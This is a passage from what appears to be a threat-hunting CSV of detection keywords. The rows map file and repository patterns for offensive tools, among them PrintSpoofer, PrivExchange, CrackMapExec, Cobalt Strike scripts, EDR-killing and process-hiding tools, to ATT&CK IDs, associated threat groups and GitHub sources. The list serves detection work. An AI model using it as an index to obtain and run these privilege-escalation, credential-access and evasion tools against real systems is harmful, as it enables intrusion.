T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","9880" "*/PrintSpoofer.exe*",".{0,1000}\/PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","PrintSpoofer","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","9881" "*/PrintSpoofer.exe*",".{0,1000}\/PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","PrintSpoofer","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","PrintSpoofer","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","9882" "*/PrintSpoofer.exe*",".{0,1000}\/PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","9883" 
"*/PrintSpoofer.git*",".{0,1000}\/PrintSpoofer\.git.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","9884" "*/PrintSpoofer.git*",".{0,1000}\/PrintSpoofer\.git.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","9885" "*/PrintSpoofer/*",".{0,1000}\/PrintSpoofer\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - 
Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","N/A","10","10","88","12","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z","9886" "*/Priv_Esc.sh*",".{0,1000}\/Priv_Esc\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","9887" "*/PrivEditor.dll*",".{0,1000}\/PrivEditor\.dll.{0,1000}","offensive_tool_keyword","PrivFu","Kernel Mode WinDbg extension for token privilege edit","T1055 - T1078 - T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","9888" "*/Privesc.git*",".{0,1000}\/Privesc\.git.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","1","N/A","N/A","10","6","595","97","2024-12-01T15:24:41Z","2015-11-19T13:22:01Z","9889" "*/privesc.ps1*",".{0,1000}\/privesc\.ps1.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/enjoiz/Privesc","1","1","N/A","N/A","10","6","595","97","2024-12-01T15:24:41Z","2015-11-19T13:22:01Z","9890" "*/PrivEsc.psm1*",".{0,1000}\/PrivEsc\.psm1.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","1","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","9891" "*/privesc/*",".{0,1000}\/privesc\/.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - 
Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","9892" "*/PrivescCheck*",".{0,1000}\/PrivescCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","9893" "*/PrivescCheck.ps1*",".{0,1000}\/PrivescCheck\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","9894" "*/PrivExchange*",".{0,1000}\/PrivExchange.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","9895" "*/PrivExchange.git*",".{0,1000}\/PrivExchange\.git.{0,1000}","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","9896" "*/privexchange.py*",".{0,1000}\/privexchange\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for 
hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","9897" "*/PrivFu.git*",".{0,1000}\/PrivFu\.git.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","9898" "*/privilege escalation.cna*",".{0,1000}\/privilege\sescalation\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","9899" "*/PrivilegeEscalation/*",".{0,1000}\/PrivilegeEscalation\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","9900" "*/Privileger.git*",".{0,1000}\/Privileger\.git.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","N/A","8","2","136","32","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z","9901" "*/PrivKit.git*",".{0,1000}\/PrivKit\.git.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple 
beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","9902" "*/PrivKit/*",".{0,1000}\/PrivKit\/.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","9903" "*/proberbyte.go*",".{0,1000}\/proberbyte\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - 
LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","9905" "*/procdump.py*",".{0,1000}\/procdump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9906" "*/process_herpaderping/*",".{0,1000}\/process_herpaderping\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9908" "*/process_killer.cpp*",".{0,1000}\/process_killer\.cpp.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","9909" "*/processhider.c*",".{0,1000}\/processhider\.c.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","9912" "*/processinjection.exe*",".{0,1000}\/processinjection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","9913" 
"*/Process-Instrumentation-Syscall-Hook*",".{0,1000}\/Process\-Instrumentation\-Syscall\-Hook.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","9914" "*/prometheus.exe",".{0,1000}\/prometheus\.exe","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","N/A","10","10","193","66","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z","9916" "*/ProtectMyTooling.git*",".{0,1000}\/ProtectMyTooling\.git.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","9917" "*/ProtectMyTooling.py*",".{0,1000}\/ProtectMyTooling\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","9918" 
"*/ProtectMyTooling.yaml*",".{0,1000}\/ProtectMyTooling\.yaml.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","9919" "*/ProtectMyToolingGUI.py*",".{0,1000}\/ProtectMyToolingGUI\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","9920" "*/protocols/ftp.py*",".{0,1000}\/protocols\/ftp\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","9921" "*/protocols/ldap.py*",".{0,1000}\/protocols\/ldap\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","9922" "*/protocols/mssql.py*",".{0,1000}\/protocols\/mssql\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","9923" "*/protocols/rdp.py*",".{0,1000}\/protocols\/rdp\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","9924" "*/protocols/rdp.py*",".{0,1000}\/protocols\/rdp\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","9925" "*/protocols/smb.py*",".{0,1000}\/protocols\/smb\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","9926" "*/protocols/ssh.py*",".{0,1000}\/protocols\/ssh\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","9927" "*/Proxmark3*",".{0,1000}\\Proxmark3.{0,1000}","offensive_tool_keyword","Proxmark","The proxmark3 is a powerful general purpose RFID tool. the size of a deck of cards. designed to snoop. 
